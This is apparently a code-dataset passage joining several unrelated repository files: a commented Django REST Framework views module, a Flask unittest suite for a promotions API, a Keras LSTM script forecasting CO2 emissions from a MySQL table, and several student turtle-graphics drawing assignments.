# It works by generating a random token string when the user logs in;
# every request to the API that needs authentication then includes this
# token string, so it effectively acts as a password that confirms each
# request is authenticated correctly.
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken # DRF comes with an Auth Token view out the box
from rest_framework.settings import api_settings
from rest_framework.permissions import IsAuthenticated # blocks access to the entire endpoint unless the user is authenticated
from profiles_api import serializers
from profiles_api import models
from profiles_api import permissions
class HelloApiView(APIView): # creates a new class based on the APIView class that Django REST framework provides.
# It allows us to define the application logic for the endpoint that we are going to
# assign to this view. You define a URL, which is our endpoint, assign
# this view to it, and Django REST framework handles calling the appropriate function
# in the view for the HTTP request you make.
"""Test API View"""
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Returns a list of APIView features"""
an_apiview = [
'Uses HTTP method as function (get, post, patch, put, delete)',
'Is similar to a traditional Django View',
'Gives you the most control over your application logic',
'Is mapped manually to URLs',
]
return Response({'message': 'Hello!', 'an_apiview': an_apiview}) # Response needs to contain a dict or list because it converts Response into JSON
def post(self, request):
"""Create a hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name') # retrieves the name field
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None): # usually has an id (primary key) of an object you are updating
"""Handle updating an entire object"""
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
"""
Handle a partial update of an object,
based on the fields provided in the request
"""
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
"""Delete an object"""
return Response({'method': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
"""Test API ViewSet"""
serializer_class = serializers.HelloSerializer
def list(self, request):
"""Return a hello message"""
a_viewset = [
'Uses actions (list, create, retrieve, update, partial_update)',
'Automatically maps to URLs using Routers',
'Provides more functionality with less code'
]
return Response({'message': 'Hello!', 'a_viewset': a_viewset})
def create(self, request):
"""Create a new hello message"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handle getting an object by its ID"""
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
"""Handle updating an object"""
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handle updating part of an object"""
return Response({'http_method': 'PATCH'})
def destroy(self, request, pk=None):
"""Handle removing an object"""
return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet): # ModelViewSet is specifically designed for managing models through our API
"""Handle creating and updating profiles"""
serializer_class = serializers.UserProfileSerializer
queryset = models.UserProfile.objects.all() # DRF knows the standard functions that you would want to perform on ModelViewSet: create, list, update, partial_update, destroy.
# DRF takes care of all that once we assign a serializer_class (a model serializer) and a queryset.
authentication_classes = (TokenAuthentication,) # tuple, you can add all authentication classes here, but we'll be using AuthToken
permission_classes = (permissions.UpdateOwnProfile,)
filter_backends = (filters.SearchFilter,) # tuple
search_fields = ('name', 'email',) # searchable fields
class UserLoginApiView(ObtainAuthToken):
"""Handle creating user authentication tokens"""
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES # The ObtainAuthToken class doesn't enable itself in the browsable API by default.
# So we need to override this class and customize it so it's visible in the browsable API,
# which makes it easier for us to test. We need to add renderer_classes manually.
class UserProfileFeedViewSet(viewsets.ModelViewSet):
"""Handles creating, reading and updating profile feed items"""
authentication_classes = (TokenAuthentication,)
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (permissions.UpdateOwnStatus, IsAuthenticated)
def perform_create(self, serializer): # DRF's function that allows you to customize the behavior for creating objects through a model ViewSet. When a request gets made to our ViewSet, it gets passed to our serializer class and validated, and then the serializer.save() is called by default.
"""Sets the user profile to the logged-in user"""
serializer.save(user_profile=self.request.user) # when a new object is created (HTTP POST call), DRF calls perform_create() and it passes in the serializer that we are using to create the object.
# The serializer is a model serializer so it has a save() function assigned to it. That save() function is used to save the contents of the serializer to an object in the DB.
# We are calling serializer.save() and passing in an additional keyword argument for 'user_profile'. This gets passed in in addition to all the items in the serializer that have been validated.
# Request object is an object that gets passed into all viewsets every time a request is made.
# Request contains all the details about the request being made to the viewset.
# If the user has authenticated, then the request has a user associated to the authenticated user. So the user field is added whenever the user is authenticated.
# If the user is not authenticated, it's just set to an anonymous user account.
``` |
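The views above rely on serializer classes defined in profiles_api/serializers.py, which is not shown here. The sketch below is a hypothetical HelloSerializer (its real definition may differ) together with the validate-then-read flow the views use; it assumes it runs inside a configured Django project:

```python
from rest_framework import serializers

class HelloSerializer(serializers.Serializer):
    """Hypothetical serializer: accepts a short name field."""
    name = serializers.CharField(max_length=10)

# Same pattern as in HelloApiView.post / HelloViewSet.create above.
serializer = HelloSerializer(data={'name': 'Ada'})
if serializer.is_valid():
    print('Hello {}!'.format(serializer.validated_data.get('name')))
else:
    print(serializer.errors)
```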
{
"source": "2020-nyu-devops/promotions",
"score": 2
} |
#### File: promotions/tests/test_service.py
```python
import os
import logging
import unittest
from datetime import datetime
from unittest import TestCase
from flask_api import status # HTTP Status Codes
from service.models import Promotion, DataValidationError, db, PromoType, Product
from service import app
from service.service import init_db
from .factories import PromotionFactory, ProductFactory
from freezegun import freeze_time
DATABASE_URI = os.getenv(
"DATABASE_URI", "postgres://postgres:postgres@localhost:5432/postgres"
)
######################################################################
# T E S T C A S E S
######################################################################
@freeze_time("2020-11-03")
class TestPromotionService(TestCase):
""" REST API Server Tests """
@classmethod
def setUpClass(cls):
""" Run once before all tests """
app.config["TESTING"] = True
app.config["DEBUG"] = False
app.config["SQLALCHEMY_DATABASE_URI"] = DATABASE_URI
app.logger.setLevel(logging.CRITICAL)
init_db()
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
""" Runs before each test """
db.drop_all() # clean up the last tests
db.create_all() # create new tables
self.app = app.test_client()
def tearDown(self):
db.session.remove()
db.drop_all()
def _create_promotions(self, count):
""" Factory method to create promotions in bulk """
promotions = []
for _ in range(count):
test_promotion = PromotionFactory()
logging.debug(test_promotion.serialize())
resp = self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
self.assertEqual(
resp.status_code,
status.HTTP_201_CREATED,
"Could not create test promotion",
)
new_promotion = resp.get_json()
test_promotion.id = new_promotion["id"]
promotions.append(test_promotion)
return promotions
######################################################################
# P L A C E T E S T C A S E S H E R E
######################################################################
def test_index(self):
""" Test index call """
resp = self.app.get("/")
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertIn(b"NYU DevOps eCommerce Promotions", resp.data)
def test_create_promotion(self):
""" Create a new Promotion """
test_promotion = PromotionFactory()
logging.debug(test_promotion)
resp = self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# Check the data is correct
new_promotion = resp.get_json()
self.assertEqual(
new_promotion["title"], test_promotion.title, "Titles do not match"
)
self.assertEqual(
new_promotion["description"],
test_promotion.description,
"Descriptions do not match",
)
self.assertEqual(
new_promotion["promo_code"],
test_promotion.promo_code,
"Promo Codes do not match",
)
self.assertEqual(
new_promotion["promo_type"],
test_promotion.promo_type.name,
"Promo Types do not match",
)
self.assertEqual(
new_promotion["amount"], test_promotion.amount, "Amounts do not match"
)
self.assertEqual(
new_promotion["start_date"],
test_promotion.start_date.isoformat(),
"Start Date does not match",
)
self.assertEqual(
new_promotion["end_date"],
test_promotion.end_date.isoformat(),
"End Date does not match",
)
self.assertEqual(
new_promotion["is_site_wide"],
test_promotion.is_site_wide,
"Is Site Wide bool does not match",
)
def test_create_promotion_with_product(self):
""" Create a new Promotion With Product """
resp = self.app.post(
"/promotions",
json={
"id": 1,
"title": "Halloween Special",
"description": "Some items off in honor of the spookiest month.",
"promo_code": "hween",
"promo_type": "DISCOUNT",
"amount": 25,
"start_date": "2020-10-20T00:00:00",
"end_date": "2020-11-01T00:00:00",
"is_site_wide": False,
"products": [123, 456],
},
content_type="application/json",
)
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# Check the promotion got created
new_promotion = resp.get_json()
self.assertEqual(
new_promotion["title"], "Halloween Special", "Title does not match"
)
self.assertEqual(
new_promotion["products"], [123, 456], "Products does not match"
)
def test_get_promotion(self):
""" Get a single Promotion """
# get the id of a promotion
test_promotion = self._create_promotions(1)[0]
resp = self.app.get(
"/promotions/{}".format(test_promotion.id), content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(data["title"], test_promotion.title)
def test_get_promotion_not_found(self):
""" Get a Promotion thats not found """
resp = self.app.get("/promotions/0")
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
def test_list_promotion(self):
""" List all promotions in the database """
# create two promotions
test_promotion00 = self._create_promotions(1)[0]
test_promotion01 = self._create_promotions(1)[0]
# if it gets 200 status, we pass
resp = self.app.get("/promotions")
self.assertEqual(resp.status_code, status.HTTP_200_OK)
# check that the ID of test promos match JSON returned
data = resp.get_json()
self.assertEqual(data[0]["id"], test_promotion00.id)
self.assertEqual(data[1]["id"], test_promotion01.id)
def test_update_promotion(self):
""" Update an existing Promotion """
# create a promotion to update
test_promotion = PromotionFactory()
resp = self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# update the promotion
new_promotion = resp.get_json()
new_promotion["title"] = "unknown"
new_promotion["products"] = [123]
resp = self.app.put(
"/promotions/{}".format(new_promotion["id"]),
json=new_promotion,
content_type="application/json",
)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
updated_promotion = resp.get_json()
self.assertEqual(updated_promotion["title"], "unknown")
self.assertEqual(updated_promotion["products"], [123])
# check that trying to update a non-existent promotion returns 404 not found
resp = self.app.put(
"/promotions/{}".format("999999999999999"),
json=new_promotion,
content_type="application/json",
)
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_promotion(self):
""" Delete a Promotion """
test_promotion = self._create_promotions(1)[0]
resp = self.app.delete(
"/promotions/{}".format(test_promotion.id), content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(len(resp.data), 0)
# make sure they are deleted
resp = self.app.get(
"/promotions/{}".format(test_promotion.id), content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
# If you call the DELETE function on a promotion that doesn't exist, should return OK
def test_delete_promotion_not_exist(self):
""" Delete a Promotion that does not exist """
resp = self.app.delete(
"/promotions/{}".format("9999999999999999"), content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
def test_query_promotion_list_by_site_wide(self):
""" Query all promotions in the database by site-wide """
# Create a set of promotions
promotions, is_site_wide_list = [], [True, False, True]
for site_wide in is_site_wide_list:
test_promotion = PromotionFactory()
test_promotion.is_site_wide = site_wide
resp = self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
new_promotion = resp.get_json()
promotions.append(new_promotion)
logging.debug(new_promotion)
resp = self.app.get("/promotions", query_string=f"is_site_wide={True}")
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
for promotion, site_wide in zip(promotions, is_site_wide_list):
if site_wide:
self.assertIn(promotion, data)
else:
self.assertNotIn(promotion, data)
def test_query_promotion(self):
""" Query all promotions in the database by multiple parameters """
product_1 = Product()
product_1.id = 100
product_2 = Product()
product_2.id = 200
db.session.add(product_1)
db.session.add(product_2)
# Define the test cases
test_cases = [
{
"title": "0",
"promo_code": "XYZ0000",
"promo_type": PromoType.DISCOUNT,
"amount": 50,
"is_site_wide": False,
"start_date": datetime(2020, 10, 17),
"end_date": datetime(2020, 10, 21),
},
{
"title": "1",
"promo_code": "XYZ0001",
"promo_type": PromoType.DISCOUNT,
"amount": 10,
"is_site_wide": True,
"start_date": datetime(2020, 10, 21),
"end_date": datetime(2021, 10, 23),
},
{
"title": "2",
"promo_code": "XYZ0002",
"promo_type": PromoType.BOGO,
"amount": 2,
"is_site_wide": False,
"start_date": datetime(2020, 10, 14),
"end_date": datetime(2020, 10, 18),
},
{
"title": "3",
"promo_code": "XYZ0003",
"promo_type": PromoType.DISCOUNT,
"amount": 20,
"is_site_wide": False,
"start_date": datetime(2020, 10, 14),
"end_date": datetime(2021, 10, 18),
},
]
tests = [
("is_site_wide=true", 1),
("is_site_wide=true&product=100", 0),
("is_site_wide=true&active=1", 1),
("is_site_wide=false&active=0", 2),
("is_site_wide=true&title=3", 0),
("is_site_wide=false", 3),
("is_site_wide=false&product=200", 1),
("promo_code=XYZ0004", 0),
("promo_code=XYZ0003", 1),
("promo_code=XYZ0003&is_site_wide=false", 1),
("amount=20&is_site_wide=false", 1),
("amount=20&is_site_wide=true", 0),
("promo_type=DISCOUNT&is_site_wide=true", 1),
("start_date=2020-10-17T00:00:00", 1),
("promo_type=BOGO", 1),
("start_date=Sat, 17 Oct 2020 00:00:00 GMT", 1),
(
"start_date=Tue, 14 Oct 2020 00:00:00 GMT&end_date=Wed, 18 Oct 2020 00:00:00 GMT",
1,
),
("duration=4", 2),
("active=0", 2),
("active=1", 2),
("product=100", 3),
("product=200", 1),
("", 4),
]
# Create the set of Promotions
for test_case in test_cases:
test_promotion = Promotion()
if not test_case["is_site_wide"]:
test_promotion.products = [product_1]
if test_case["promo_code"] == "XYZ0003":
test_promotion.products.append(product_2)
for attribute in test_case:
setattr(test_promotion, attribute, test_case[attribute])
resp = self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
# Carry out the tests
for query_str, length_of_result in tests:
logging.debug(query_str)
resp = self.app.get("/promotions", query_string=query_str)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
print(query_str)
self.assertEqual(len(data), length_of_result)
def test_cancel_promotion(self):
""" Cancel a promotion """
# try to cancel it before it's in there
resp = self.app.post(
"/promotions/{}/cancel".format(1), content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
# create a new promotion
test_promotion = self._create_promotions(1)[0]
# cancel the promotion
resp = self.app.post(
"/promotions/{}/cancel".format(test_promotion.id),
content_type="application/json",
)
# if it gets 200 status, we pass
self.assertEqual(resp.status_code, status.HTTP_200_OK)
def test_apply_best_promotions(self):
""" Test Apply Best Promotion """
# API: /promotions/apply?product_id=product_price
# Product - Promotion mapping
# Product 1
## Available: Promo 1, Promo 2 (Store-wide), Promo 3, Promo 6 (Store-wide, Expired)
## Best: Promo 3 (BOGO)
# Product 2
## Available: Promo 1, Promo 2 (Store-wide), Promo_4, Promo 6 (Store-wide, Expired)
## Best: Promo 4 (80%)
# Product 3
## Available: Promo 2 (Store-wide), Promo 6 (Store-wide, Expired)
## Best: Promo 2 (10%)
# Product 4
## Available: Promo 2 (Store-wide), Promo 5, Promo 6 (Store-wide, Expired)
## Best: Promo 5 (FIXED, 150)
product_1 = Product()
product_1.id = 100
product_2 = Product()
product_2.id = 200
product_3 = Product()
product_3.id = 300
product_4 = Product()
product_4.id = 400
db.session.add(product_1)
db.session.add(product_2)
db.session.add(product_3)
db.session.add(product_4)
# Define the promotions
promotions = [
{
"promo_code": "promo_code_1",
"promo_type": PromoType.DISCOUNT,
"amount": 40,
"is_site_wide": False,
"start_date": datetime(2020, 9, 2),
"end_date": datetime(2021, 10, 21),
},
{
"promo_code": "promo_code_2",
"promo_type": PromoType.DISCOUNT,
"amount": 10,
"is_site_wide": True,
"start_date": datetime(2020, 8, 21),
"end_date": datetime(2021, 10, 23),
},
{
"promo_code": "promo_code_3",
"promo_type": PromoType.BOGO,
"amount": 1,
"is_site_wide": False,
"start_date": datetime(2020, 9, 1),
"end_date": datetime(2021, 5, 30),
},
{
"promo_code": "promo_code_4",
"promo_type": PromoType.DISCOUNT,
"amount": 80,
"is_site_wide": False,
"start_date": datetime(2020, 10, 14),
"end_date": datetime(2021, 5, 18),
},
{
"promo_code": "promo_code_5",
"promo_type": PromoType.FIXED,
"amount": 150,
"is_site_wide": False,
"start_date": datetime(2020, 10, 14),
"end_date": datetime(2021, 10, 18),
},
{
"promo_code": "promo_code_6",
"promo_type": PromoType.DISCOUNT,
"amount": 80,
"is_site_wide": True,
"start_date": datetime(2020, 9, 14),
"end_date": datetime(2020, 10, 15),
},
]
tests = [
("100=1000&200=5000", []),
(
"100=1000&200=5000&300=268&400=255",
[
{"100": "promo_code_3"},
{"200": "promo_code_4"},
{"300": "promo_code_2"},
{"400": "promo_code_5"},
],
),
("", []),
]
# Carry out the tests without promotions in the system
for cart, result in tests[:1]:
resp = self.app.get("/promotions/apply", query_string=cart)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(data, result)
# Create the set of Promotions
logging.debug("Creating promotions")
for promo in promotions:
test_promotion = PromotionFactory()
for attribute in promo:
setattr(test_promotion, attribute, promo[attribute])
if promo["promo_code"] == "promo_code_1":
test_promotion.products.append(product_1)
test_promotion.products.append(product_2)
elif promo["promo_code"] == "promo_code_3":
test_promotion.products.append(product_1)
elif promo["promo_code"] == "promo_code_4":
test_promotion.products.append(product_2)
elif promo["promo_code"] == "promo_code_5":
test_promotion.products.append(product_4)
logging.debug(
f" Promo: {promo['promo_code']} (Promo ID: {test_promotion.id}): Products - {test_promotion.products}"
)
self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
logging.debug("Promotions created")
# Carry out the tests
for cart, result in tests[1:]:
logging.debug(cart)
resp = self.app.get("/promotions/apply", query_string=cart)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(data, result)
# ---------------------------------------------------------------
# > Test Cases for Error Handlers <
# ---------------------------------------------------------------
def test_invalid_content_type(self):
""" Test Invalid Content Type """
resp = self.app.post(
"/promotions", json="This is a string", content_type="text/html"
)
print(resp.__dir__())
print(resp.get_json())
self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)
def test_bad_request(self):
""" Test Bad Request """
resp = self.app.post(
"/promotions", json="{'test': 'promotion'}", content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
def test_method_not_allowed(self):
""" Test Method Not Allowed """
resp = self.app.put("/promotions")
self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
######################################################################
# M A I N
######################################################################
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "2020-SKKU-S-HERO/mobius_adaptation",
"score": 3
} |
#### File: mobius_adaptation/database/pred_model_update.py
```python
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.layers import LSTM, Dense, Dropout, Activation
from tensorflow.keras.models import Sequential
from sqlalchemy import create_engine
from datetime import timedelta
engine = create_engine('mysql+pymysql://root:shero@localhost/sheroDB', echo=True)
def get_data_from_db():
sql = 'select * from co2_emissions where location="인천"'
data = pd.read_sql(sql, engine)
data['date_time'] = pd.to_datetime(data['date_time'])
data = data.set_index('date_time',inplace=False)
data = data.resample(rule='1440T').sum()
return data
def scale(df):
scaler = MinMaxScaler(feature_range=(0, 1))
scale_cols = ['limestone', 'clay', 'silica_stone', 'iron_oxide', 'gypsum', 'coal', 'emissions']
scaled_data = scaler.fit_transform(df[scale_cols])
scaled_data = pd.DataFrame(scaled_data)
scaled_data.columns = scale_cols
#print("scaled_data ::::")
#print(scaled_data.head(31))
return (scaled_data, scaler)
def denormalize(feature, pred ,scaler):
denorm_predict = []
feature["emissions"] = pred
denorm = scaler.inverse_transform(feature)
for item in denorm:
denorm_predict.append(item[6])
return np.array(denorm_predict)
def feature_label_split(df):
feature_cols = ['limestone', 'clay', 'silica_stone', 'iron_oxide', 'gypsum', 'coal']
label_cols = ['emissions']
train_feature = df[feature_cols]
train_label = df[label_cols]
return (train_feature, train_label)
def make_3D(feature, label, window_size):
dataX, dataY = [], []
for i in range(len(feature)-window_size):
dataX.append(np.array(feature.iloc[i:i+window_size]))
dataY.append(np.array(label.iloc[i+window_size]))
return (np.array(dataX), np.array(dataY))
def make_single_3D(feature, window_size):
dataX = []
for i in range(len(feature)-window_size):
dataX.append(np.array(feature.iloc[i:i+window_size]))
return np.array(dataX)
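# Note on the windowing helpers above (an illustrative comment, not part of the
# original script): make_3D slides a window_size-row window over the frame, so N
# rows of features become N - window_size samples of shape (window_size, n_features),
# each labelled with the emissions value of the row immediately after its window;
# make_single_3D builds the same windows without labels.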
data = get_data_from_db()
train, scaler = scale(data)
#train = data
feature, label = feature_label_split(train)
train_feature_3d, train_label_3d = make_3D(feature, label, 30)
def build_model(feature_3d):
model = Sequential()
model.add(LSTM(64, input_shape=(feature_3d.shape[1], feature_3d.shape[2]),activation='relu',return_sequences=False))
model.add(Dropout(0.3))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
return model
test_feature = pd.concat([feature.iloc[-90:, :], feature.iloc[-365:-305, :]], ignore_index=True)
denom_feature = pd.concat([feature.iloc[-60:, :], feature.iloc[-365:-305, :]], ignore_index=True)
#print(denom_feature.head(20))
#print(denom_feature.info())
#print()
test_label = np.array(label.iloc[-60:, :]).flatten()
test_label = np.append(test_label, np.zeros(60))
test_feature_3d = make_single_3D(test_feature, 30)
#print(train.iloc[-90:-40, :])
#print(test_feature.head())
#print(test_label)
model = build_model(train_feature_3d)
hist = model.fit(train_feature_3d, train_label_3d, epochs=300, batch_size=64)
predict_value = model.predict(test_feature_3d)
predict_value = predict_value.flatten()
denom_predict_value = denormalize(denom_feature, predict_value, scaler)
denom_real_value = np.array(data.iloc[-60:, 0]).flatten()
denom_real_value = np.append(denom_real_value, np.zeros(60))
#print(denom_real_value)
#print(data.head())
loc=[]
for i in range(120):
loc.append(['인천'])
loc = np.array(loc).flatten()
pred_date = data.iloc[-120:]
pred_date = np.array(pred_date.index)
pred_date = pd.DatetimeIndex(pred_date) + timedelta(days=60)
pred_date = np.array(pred_date)
#dic = {'date_time' : pred_date, 'actual_value' : test_label, 'predict_value' : predict_value , 'location' : loc}
dic = {'date_time' : pred_date, 'actual_value' : denom_real_value, 'predict_value' : denom_predict_value , 'location' : loc}
dff = pd.DataFrame(dic)
print(dff.head(20))
dff.to_sql(name='predict_value',con=engine, if_exists='append')
``` |
{
"source": "2020-Spring-CSC-226/a03-master",
"score": 3
} |
#### File: 2020-Spring-CSC-226/a03-master/a03_dabbsr.py
```python
"""
<NAME>
dabbsr
https://docs.google.com/document/d/1NYZeAN_fGb0iTEdF8upy8mrT_fNUva248VOr3c7x7pY/edit#
"""
import turtle
wn = turtle.Screen()
wn.colormode(255)
wn.bgcolor(5,160,170)
luigi = turtle.Turtle()
def red_shape():
"""
first
"""
luigi.color("Red")
luigi.begin_fill()
luigi.speed(0)
luigi.left(15)
luigi.forward(45)
print(luigi.pos())
luigi.left(60)
luigi.forward(45)
luigi.left(40)
luigi.forward(132)
print(luigi.pos())
luigi.setpos(0,0)
luigi.end_fill()
def yellow_shape():
"""
second
"""
luigi.color("Yellow")
luigi.begin_fill()
luigi.forward(70)
print(luigi.pos())
luigi.setpos(-0.67,174.75)
luigi.setpos(0,0)
luigi.end_fill()
def og_shape():
"""
third
"""
luigi.color("Orange")
luigi.setheading(180)
luigi.begin_fill()
luigi.forward(200)
luigi.setpos(-29.58,63.44)
luigi.setpos(0,0)
luigi.end_fill()
def green_shape():
"""
fourth
"""
luigi.color("Green")
luigi.setheading(180)
luigi.begin_fill()
luigi.forward(200)
luigi.setpos(-29.58,-63.44)
luigi.setpos(0,0)
luigi.end_fill()
def wt_shape():
"""
fifth
"""
luigi.color("White")
luigi.begin_fill()
luigi.setpos(-29.58,-63.44)
print(luigi.pos())
luigi.setpos(-0.67,-174.75)
luigi.setpos(0,0)
luigi.end_fill()
def pnk_shape():
"""
final
"""
luigi.color("Pink")
luigi.setheading(0)
luigi.begin_fill()
luigi.left(-15)
luigi.forward(45)
print(luigi.pos())
luigi.left(-60)
luigi.forward(45)
luigi.left(-40)
luigi.forward(132)
print(luigi.pos())
luigi.setpos(0,0)
luigi.end_fill()
def main():
"""
puts all sections together of the pop art
"""
red_shape()
yellow_shape()
og_shape()
green_shape()
wt_shape()
pnk_shape()
wn.title("Pop Art")
wn.exitonclick()
main()
```
#### File: 2020-Spring-CSC-226/a03-master/A03_davisj2.py
```python
import turtle
def move(t, x, y):
t.up()
t.setpos(x, y)
t.down()
def borders(t):
t.penup()
t.setpos(-250,-250)
t.pendown()
t.pensize(20)
for i in range(4):
t.forward(500)
t.left(90)
def ground(t):
t.penup()
t.setpos(-250,-200)
t.pendown()
t.color('#00ff00')
t.begin_fill()
t.forward(500)
t.right(90)
t.forward(50)
t.right(90)
t.forward(500)
t.right(90)
t.forward(50)
t.end_fill()
def house(t):
t.penup()
t.setpos(-190,-200)
t.pendown()
t.color('#964b00')
t.begin_fill()
for i in range(4):
t.forward(260)
t.left(90)
t.end_fill()
def roof(t):
t.penup()
t.setpos(-190,60)
t.pendown()
t.color('#B5651D')
t.begin_fill()
for i in range(3):
t.forward(260)
t.left(120)
t.end_fill()
def sun(t):
t.penup()
t.setpos(160,60)
t.pendown()
t.color('#ffff00')
t.begin_fill()
t.circle(70)
t.end_fill()
def main():
J = turtle.Turtle()
X = turtle.Turtle()
C = turtle.Turtle()
T = turtle.Turtle()
S = turtle.Turtle()
wn = turtle.Screen()
wn.bgcolor('#add8e6')
wn.screensize(500,500)
borders(J)
ground(X)
house(C)
roof(T)
sun(S)
wn.exitonclick()
main()
```
#### File: 2020-Spring-CSC-226/a03-master/a03_fotim.py
```python
import turtle
from time import sleep
def move (t, x, y):
"""
Moves the turtle to a specified location using X, Y coordinate pairs.
:param t: The turtle to be moved
:param x: The X coordinate
:param y: The Y coordinate
:return: None
"""
t.up()
t.setpos(x, y)
t.down()
def OutsideRing(Outside, i):
move(Outside, -45, 170)
while i < 3: # The loop that creates the outer ring.
i += 1
Outside.fd(80)
Outside.right(80)
Outside.fd(20)
Outside.left(65)
Outside.circle(-100, 90)
Outside.left(65)
Outside.fd(20)
Outside.right(80)
i = 0
def InnerRing(Inside, i, k):
move(Inside, -5, 115)
while i < 3: # The loop that creates the inner ring.
i += 1
Inside.circle(-70, 120)
Inside.right(90) # Turns to create each arrow.
Inside.back(20)
Inside.fd(60)
Inside.right(90)
Inside.fd(10)
while k < 3: # The loop that creates the tips of the arrows within the inner ring.
k += 1
Inside.left(120)
Inside.fd(20)
k = 0
Inside.back(10)
Inside.left(90)
Inside.fd(10)
Inside.back(50)
Inside.left(90) # The end of each arrow
def SCP(Letters):
move(Letters, -67, -100) # Draws the S
Letters.fd(18)
Letters.back(18)
Letters.circle(-20, -180)
Letters.circle(20, -180)
Letters.back(18)
move(Letters, 8, -102) # Draws the C
Letters.fd(10)
Letters.back(10)
Letters.circle(-38, -180)
Letters.back(10)
# print(Letters.pos())
move(Letters, 38, -178) # Draws the P
Letters.right(90)
Letters.fd(60)
Letters.circle(-20, 270)
def main():
wn = turtle.Screen()
Outside = turtle.Turtle()
Inside = turtle.Turtle()
Letters = turtle.Turtle()
i = 0
k = 0
Outside.width(10)
Inside.width(10)
Letters.width(15)
wn.bgcolor(0, 0, 0)
Outside.pencolor(1, 1, 1)
Inside.pencolor(1, 1, 1)
Letters.pencolor(1, 1, 1)
OutsideRing(Outside, i)
InnerRing(Inside, i, k)
SCP(Letters)
wn.exitonclick()
main()
```
#### File: 2020-Spring-CSC-226/a03-master/A03_jacciboggs.py
```python
import turtle
#make the roof made of bricks
def make_roof(wn, shape):
"""
Draws a roof made of bricks
:param wn:
:param shape:
:return:
"""
wn.register_shape("Bricks.gif")  # registers a shape from the Bricks.gif image
#draw the body of the house - a rectangle
def draw_square(houseturtle):
"""
:param houseturtle:
:return:
"""
houseturtle.color(50, 168, 82)
houseturtle.penup()
houseturtle.goto(-250, -250)
houseturtle.pendown()
houseturtle.fillcolor(50, 168, 82)
for i in range (4):
houseturtle.forward(300)
houseturtle.left(90)
#draw the roof of the house - a triangle on top of the rectangle
def draw_roof(houseturtle):
"""
:param houseturtle:
:return:
"""
houseturtle.color(50, 168, 82)
houseturtle.penup()
houseturtle.goto(-230, -230)
houseturtle.pendown()
houseturtle.left(180)
houseturtle.forward(400)
houseturtle.begin_fill()
for i in range (3):
houseturtle.right(120)
houseturtle.forward(200)
houseturtle.end_fill()
houseturtle.penup()
#draw a chimney - a small rectangle at the top of the triangle
#draw smoke coming out of the chimney
#main
def main():
"""
:return:
"""
houseturtle = turtle.Turtle()
wn = turtle.Screen()
wn.colormode(255)
houseturtle.pensize (10)
draw_square(houseturtle)
draw_roof(houseturtle)
#draw_chimney(houseturtle)
#draw_smoke(houseturtle)
wn.exitonclick()
main()
```
#### File: 2020-Spring-CSC-226/a03-master/a03_quintanarpenaa.py
```python
import turtle
def smokey(n):
"""creates smoke"""
n.left(-10)
n.circle(20, extent=-180)
n.right(180)
def rep(bd):
"""moves the turtle back into position"""
bd.penup()
bd.right(90)
bd.fd(320)
bd.right(90)
bd.fd(285)
bd.left(180)
bd.pendown()
def smoke(mn):
"""creates smoke"""
mn.left(-10)
mn.circle(20, extent=-180)
mn.right(180)
def chimmeny(ui):
ui.color('black')
ui.begin_fill()
ui.right(30)
ui.fd(20)
ui.left(30)
ui.fd(40)
ui.left(90)
ui.fd(10)
ui.left(90)
ui.fd(56)
ui.left(180)
ui.fd(56)
ui.end_fill()
def reposss(ht):
ht.penup()
ht.left(90)
ht.fd(373)
ht.pendown()
def reposs(yu):
"""Positions the turtle to make a door"""
yu.penup()
